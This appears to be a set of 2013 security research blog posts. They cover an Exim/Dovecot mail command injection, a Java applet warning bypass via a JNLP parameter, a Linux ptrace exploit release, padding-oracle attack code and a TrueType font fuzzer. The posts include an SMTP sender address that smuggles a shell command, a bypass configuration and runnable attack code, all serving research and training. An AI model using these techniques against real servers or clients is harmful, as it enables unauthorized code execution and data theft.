Today a really neat advisory was released by the folks over at RedTeam Pentesting GmbH (RTP) involving a common misconfiguration when using Exim and Dovecot together. The high level is that when you use Exim as an MTA (what sends and receives mail from other servers) and Dovecot as an LDA (serves the mail to users via IMAP/POP3 etc), the example Exim configuration Dovecot provides to make the MTA->LDA connection work has a bad configuration option whereby an attacker could get command injection on your mail server by sending mail! This is totally rad for a few reasons. First, this is going to be very reliable: it's command injection, so there's no memory corruption voodoo to go wrong. Secondly, the vulnerability was introduced from one product into another by way of the admin! Plus the idea of doing command injection via email is pretty great.
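To make the shape of the attack concrete: as we read the advisory, the example pipe transport runs the Dovecot deliver binary through a shell (the use_shell option) with attacker-influenced address fields expanded into the command line, so an address carrying shell metacharacters smuggles in a command. The exact injection point and quoting below are our hedged reconstruction, not a tested payload; the addresses and command are placeholders:

```python
# Hypothetical SMTP transcript builder. With use_shell set, Exim hands the
# expanded command line to /bin/sh, so backticks in an address field (here
# the sender, which deliver receives via -f) can execute.
evil_sender = '"`touch /tmp/owned`"@attacker.example'

def build_transcript(rcpt):
    lines = [
        "HELO attacker.example",
        "MAIL FROM: <%s>" % evil_sender,
        "RCPT TO: <%s>" % rcpt,
        "DATA",
        "Subject: hi",
        "",
        "hello",
        ".",
    ]
    return "\r\n".join(lines) + "\r\n"
```

The fix is simply not using use_shell, which is why updated documentation makes this go away; the question below is how many configs were copied before that.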

In the advisory RTP released they mention that using Exim with Dovecot is a very common configuration, so I decided to see how common it really was. To do this you'd need SMTP/IMAP/POP3 banners for large IP space, which we have courtesy of SWARM. So I wrote a few MongoDB queries and did some basic work with sets in Python and came up with some interesting answers. Without expounding too much about these data sets, they're non-overlapping IP space. We'll leave it at that as it will give affected admins more time to fix their configs. I've put the results from a few of our largest data sets into a table.

DB Size (IPs)* Exim banners Dovecot banners** Exim + Dovecot (Exim + Dovecot) / Total Exim
2,086,479 50,533 69,433 36,557 72.3%
1,668,143 629 11,869 324 51.1%
753,486 22,019 24,494 20,157 91.5%

* IPs that returned results from a SWARM module, a subset of all hosts scanned for that job
** We counted unique hosts that had at least one Dovecot banner on either IMAP or POP3


  1. We did not look at IMAPS or SSL-POP
  2. If Exim and Dovecot are not run on the same server it wouldn't be included in our results
  3. If IMAP/POP3 are run on non-standard ports it wouldn't be included in our results
  4. We did not confirm the presence of the vulnerability beyond banner parsing
  5. According to RTP the errant config was introduced in 2009, so we could also filter by the presence of Dovecot versions released only after 2009, though this wouldn't take into account configurations that had remained static through upgrades

When running Exim and IMAP/POP3, Dovecot is an extremely popular choice for an LDA. I think it's fair to say that a majority of administrators would reference the Dovecot wiki or documentation when configuring this setup. As a result this vulnerability is probably present on over a hundred thousand servers. Interestingly there is a lot of regional variance for both Exim and Dovecot, though in all Dovecot appears to be more popular in our data.
Pulling this data out with SWARM was pretty easy and it gave me a rough idea of the impact of the vulnerability. Some folks only rely on the CVSS score but fail to see the larger picture. If you have reliable unauthenticated remote code execution on Bob's Fancy FTP Server that would probably score a 10 on the CVSS scale. But if there are 15 total installs of that software anywhere on the planet, the impact is going to be minimal.

Also, after the fact I learned that Mongo has a built in MapReduce which I need to learn how to use :-/

Wednesday, April 24, 2013

Yet Another Java Security Warning Bypass

Not so long ago we posted about a Java Security Warning bypass that used a serialized applet instance.
That bypass was fixed in Java 7 update 13 so we had to keep looking at new ways of defeating the warning pop-up that requires user interaction in order to run applets.

We continued auditing the code that performs the checks when starting an applet and ended up at the method “sun.plugin2.main.client.PluginMain.performSSVValidation(Plugin2Manager)”.

This method will end up calling some other methods in the com.sun.javaws.ui.SecureStaticVersioning class that will show us that annoying security warning pop up.

But just take a quick look at the performSSVValidation method implementation:

What is that __applet_ssv_validated parameter??

Obviously this is an internal undocumented parameter and, as you can see, it turns out that if it is set to true, no checks are performed.

The first thing we tried was to simply set that parameter to true in our evil applet, but it didn't work.
While debugging we noticed that the parameter was not set on the applet despite our setting it to true.

Basically sun.plugin2.main.server.MozillaPlugin.addParameter(String, String) is filtering the parameters:

But as you may know, Java provides another way of launching applets in a browser besides the applet, object or embed tags:
Java Web Start technology is what we can use.
Now the applet description is provided in a JNLP file, and parameters can be passed to the applet using the <param> tag.

We can see that when using Java Web Start, the performSSVValidation method is also called:

So let's try to launch an applet with Java Web Start and set the __applet_ssv_validated parameter to true, with a JNLP file like this one:
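The original post showed the JNLP file as an image; a hedged reconstruction of what such a file looks like follows (the jar, class and file names are illustrative placeholders - the key line is the param element):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Illustrative reconstruction of the JNLP described above -->
<jnlp spec="1.0+" href="evil.jnlp">
  <information>
    <title>Totally Legit Applet</title>
    <vendor>Not Evil Inc.</vendor>
  </information>
  <resources>
    <j2se version="1.7+"/>
    <jar href="evil.jar" main="true"/>
  </resources>
  <applet-desc name="evil" main-class="EvilApplet" width="1" height="1">
    <param name="__applet_ssv_validated" value="true"/>
  </applet-desc>
</jnlp>
```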

And by now you have already realized that this just works and parameters are not filtered.
The Security Warning pop-up message is not displayed and our applet happily runs!

Ironically, on Tuesday April 16th, exactly while I was at the Infiltrate MasterClass teaching how to audit and exploit Java, Oracle released update 21 which fixed this bypass and a ton of others.

The time investment for stealthily exploiting Java is increasing but finding bypasses like this makes it worth the time!

Esteban Guillardoy

Monday, March 18, 2013


I won the demo run of the Immunity Web Hacking class today. Who wants to try to be "superuser"?

Friday, March 15, 2013

Immunity Releases an Exploit for the Linux Kernel PTRACE vulnerability

Linux PTRACE CVE_2013_0871

Solar Designer calls this one of the more dangerous Linux local exploits since CVE-2010-3081.

There's some contention over how easy it is to exploit, and like many race conditions, it's not simple. Our current version works on 64 bit kernels in VMs (which have not been patched). To be perfectly honest, we largely tested this on VMware VMs, so on other hypervisors YMMV.

2.6.29 changed the creds structure, so our released exploit currently supports only 2.6.29 or greater. We do have a 32 bit version and a 2.x version which we'll finish testing and release at some point in the near future. And we'll try to fix the 64 bit version to work on non-VMs. It's going to be a while until this hits normal CANVAS, as we need to finish 64-bit Linux MOSDEF in order to integrate it properly.

That said, VMs are in fairly common use at the moment, so we thought people would get value out of it as-is.


The exploit discussed in this blog post is here:

Of course, you'll need a CANVAS Early Updates subscription to download this. You can email us if you don't have one.

Thursday, March 14, 2013

Hacking the web: Exploiting CBC with Padding Oracle

The process of writing training material is very organic. Not in the way where you replace meat with tofu, but rather in the sense of evolving the material for each new edition.

No matter how experienced a teacher is on the subject, every student learns differently and brings different background experience. In short, building training that is effective for a large range of people is as hard as building an exploit that is effective against a large range of machines.

That's why after each edition we try to re-write what we think are the weakest parts to make the training more targeted towards how students learn best.

As a good example, last year the Web Hacking class had a Padding Oracle section. Not only was it a very novel technique, but we were seeing all kinds of bad implementations on our consulting gigs that we were exploiting with it. We decided to rush it into our class and fit it into a two-hour period. While most people in the class understood it and were able to exploit it by the end, we felt they might not have grasped the whole concept, so this year we decided to turn it into a whole Web Crypto day.

Importantly, we decided to build an interactive framework for ECB and CBC (if you're not sure of the difference, you should attend the class!), so you can understand how to exploit a Padding Oracle in a Web 2.0 environment.
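For those who can't wait for the class, the core CBC padding-oracle loop is small enough to sketch here. A toy XOR "block cipher" stands in for AES so the example runs on the standard library alone; the oracle mimics an application that leaks whether PKCS#7 padding decrypted correctly, and the attack logic against it is the same as against a real web app:

```python
BS = 16

def pkcs7_ok(pt):
    # Valid PKCS#7: last byte n in 1..16 and the last n bytes all equal n
    pad = pt[-1]
    return 1 <= pad <= BS and pt.endswith(bytes([pad]) * pad)

# Toy "block cipher": XOR with a fixed key. CBC: C = E(P xor prev),
# so D(C) = C xor KEY. Only the oracle's yes/no answer matters.
KEY = bytes(range(BS))
xor = lambda a, b: bytes(x ^ y for x, y in zip(a, b))

def encrypt_block(plain, prev):
    return xor(xor(plain, prev), KEY)

def oracle(prev, block):
    # The side channel: does the block decrypt to valid padding?
    return pkcs7_ok(xor(xor(block, KEY), prev))

def recover_block(oracle, prev, block):
    # Classic padding-oracle recovery, byte by byte from the end
    inter = bytearray(BS)                    # will hold D(block)
    for pad in range(1, BS + 1):
        pos = BS - pad
        for g in range(256):
            fake = bytearray(BS)
            for i in range(pos + 1, BS):
                fake[i] = inter[i] ^ pad     # force known tail bytes to `pad`
            fake[pos] = g
            if oracle(bytes(fake), block):
                if pad == 1:
                    # rule out accidental longer paddings like \x02\x02
                    fake[pos - 1] ^= 0xFF
                    if not oracle(bytes(fake), block):
                        continue
                inter[pos] = g ^ pad
                break
    return xor(inter, prev)                  # plaintext = D(block) xor prev

plain = b"attack at dawn\x02\x02"            # already PKCS#7 padded
iv = bytes(BS)
assert recover_block(oracle, iv, encrypt_block(plain, iv)) == plain
```

Swap the toy oracle for an HTTP request that distinguishes a padding error from any other failure and you have the real attack, at a cost of at most 256 requests per plaintext byte.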

It was painful, but the results are looking good:

Kudos to Matias for the great work, and we are hoping to see you there in less than a month at INFILTRATE 2013's Web Hacking class!

Monday, March 11, 2013

Infiltrate Preview - TrueType Font Fuzzing and Vulnerability

TrueType font files are made up of a number of tables that together comprise an outline font; each table begins on a 4 byte boundary and must be long aligned and padded with zeroes if necessary. Referring to the “TrueType 1.0 Font File Technical Specification” provided by Microsoft, the TrueType font file begins at byte 0 with the Offset Table. The Offset Table is divided into 5 fields:

sfnt version : 65536 (0x00010000) for version 1.0
numTables : Number of tables
searchRange : (Maximum power of 2 ≤ numTables) x 16
entrySelector : Log2(Maximum power of 2 ≤ numTables)
rangeShift : numTables x 16 – searchRange
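Those relationships are easy to sanity check in code. A small sketch that builds the 12-byte Offset Table for a given table count, deriving the three search fields as described above:

```python
import math
import struct

def build_offset_table(num_tables):
    # sfnt version 1.0 is the fixed value 0x00010000 (65536)
    max_pow2 = 2 ** int(math.log2(num_tables))   # largest power of 2 <= numTables
    search_range = max_pow2 * 16
    entry_selector = int(math.log2(max_pow2))
    range_shift = num_tables * 16 - search_range
    # All sfnt fields are big-endian: one ULONG then four USHORTs
    return struct.pack(">IHHHH", 0x00010000, num_tables,
                       search_range, entry_selector, range_shift)
```

For example, 10 tables gives searchRange 128, entrySelector 3 and rangeShift 32.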

Beginning at byte 12, after the Offset Table, is the Font Table Directory. Entries in the Table Directory must be sorted in ascending order by ‘tag’ name. Each Table Directory entry consists of:

tag : 4 byte identifier
checkSum : checksum of the table
offset : Beginning offset of the font table entry
length : Length of the table

The Structure of True Type Font Directory
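A matching sketch that walks the Table Directory of a font blob, assuming exactly the layout just described (12-byte Offset Table, then numTables 16-byte entries):

```python
import struct

def parse_table_directory(font):
    # Offset Table first: ULONG sfnt version, then four USHORTs
    _, num_tables, _, _, _ = struct.unpack(">IHHHH", font[:12])
    entries = {}
    for i in range(num_tables):
        off = 12 + 16 * i
        # Each entry: 4-byte tag, ULONG checkSum, ULONG offset, ULONG length
        tag, checksum, offset, length = struct.unpack(">4sIII", font[off:off + 16])
        entries[tag.decode("latin-1")] = {"checkSum": checksum,
                                          "offset": offset,
                                          "length": length}
    return entries
```

A fuzzer uses exactly this view of the file to know which byte ranges belong to which table before mutating them.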

The required tables in the Font Table Directory:

cmap : character to glyph mapping
glyf : glyph data
head : font header
hhea : horizontal header
hmtx : horizontal metrics
loca : index to location 
maxp : maximum profile
name : naming table
post : PostScript information
OS/2 : OS/2 and Windows specific metrics

The optional tables in the Font Table Directory:

cvt : Control Value Table
EBDT : Embedded bitmap data
EBLC : Embedded bitmap location data
EBSC : Embedded bitmap Scaling data
fpgm : font program
gasp : grid-fitting and scan conversion procedure
hdmx : horizontal device metrics
kern : kerning
LTSH : Linear threshold table
prep : CVT Program
VDMX : Vertical Metrics header
vhea : Vertical Metrics

For font validation purposes, the dumb fuzzing technique is not recommended for these fields: ‘checkSum’, ‘offset’, ‘length’ and ‘tag’. To reduce the number of irrelevant tests, a checksum validation program is used to determine the checksum of the ‘head’ table.

Fix the Checksum value of the “head” Font Table Directory

During the fuzzing process, the table checksum has to be re-computed. The checksum calculation operates on 4 byte boundaries, as shown in the Python program below:
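The original post showed the routine as a screenshot; a reconstruction of the standard TrueType table checksum (sum of big-endian ULONGs over the zero-padded table, modulo 2**32) looks like this:

```python
import struct

def calc_table_checksum(table):
    # Pad with zeroes to a 4-byte boundary, then sum big-endian ULONGs mod 2**32
    table = table + b"\x00" * (-len(table) % 4)
    total = 0
    for (word,) in struct.iter_unpack(">I", table):
        total = (total + word) & 0xFFFFFFFF
    return total
```

Note that the ‘head’ table is the special case: its checkSumAdjustment field is treated as zero while its checksum is computed, which is why a dedicated fix-up pass is needed for it.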


Our font fuzzer mutates the TrueType font file at a range of different sizes, generating test cases that determine which font size triggers the vulnerability. Each fuzzing iteration starts by automating the installation of the mutated font on a Windows system. It then displays the font, both by opening the font file via fontview.exe and by displaying the character maps. Lastly, it uninstalls the font and repeats the process if no vulnerability is found.

The windll.gdi32.AddFontResourceExA function is used to automate the installation of the crafted font into the “C:\Windows\Fonts” folder.

htr = windll.gdi32.AddFontResourceExA(FileFont, FR_PRIVATE, None)

Once the fuzzing environment is ready, a LOGFONT object is created to define the attributes of a font. 
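The LOGFONT definition appeared as a screenshot in the original; in ctypes it looks roughly like this (field widths follow the Win32 LOGFONTA layout; the height, weight and face name values are just examples):

```python
import ctypes

class LOGFONTA(ctypes.Structure):
    # Win32 LOGFONTA: five 32-bit LONGs, eight BYTEs, then a 32-char face name.
    # c_int32 is used instead of c_long so the layout is identical off-Windows.
    _fields_ = [
        ("lfHeight", ctypes.c_int32),
        ("lfWidth", ctypes.c_int32),
        ("lfEscapement", ctypes.c_int32),
        ("lfOrientation", ctypes.c_int32),
        ("lfWeight", ctypes.c_int32),
        ("lfItalic", ctypes.c_ubyte),
        ("lfUnderline", ctypes.c_ubyte),
        ("lfStrikeOut", ctypes.c_ubyte),
        ("lfCharSet", ctypes.c_ubyte),
        ("lfOutPrecision", ctypes.c_ubyte),
        ("lfClipPrecision", ctypes.c_ubyte),
        ("lfQuality", ctypes.c_ubyte),
        ("lfPitchAndFamily", ctypes.c_ubyte),
        ("lfFaceName", ctypes.c_char * 32),
    ]

lf = LOGFONTA(lfHeight=-24, lfWeight=400)   # 400 = FW_NORMAL
lf.lfFaceName = b"FuzzedFont"               # the mutated font's face name
```

On Windows this structure would then be handed to GDI (e.g. CreateFontIndirectA) to render the installed font and exercise the kernel-side parsing.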


If no vulnerability has been found for the font size under test, the windll.gdi32.RemoveFontResourceExW function is called to remove the font from the “C:\Windows\Fonts” folder.

windll.gdi32.RemoveFontResourceExW(fileFont, FR_PRIVATE, None)

The next font size in the configured range is then tried, and the same process repeats until a vulnerability is found or the list of font sizes has been exhausted with no vulnerability found.

Figure below shows the Blue Screen of Death (BSOD) proof of concept via our font fuzzer. [Editor's note: BOOM! :>]

BSOD of Windows 8 Pro 

The details of the fuzzer and findings will be discussed in the talk. Looking forward to seeing you guys at INFILTRATE 2013.

--- Ling Chuan Lee & Lee Yee Chan from F13 Labs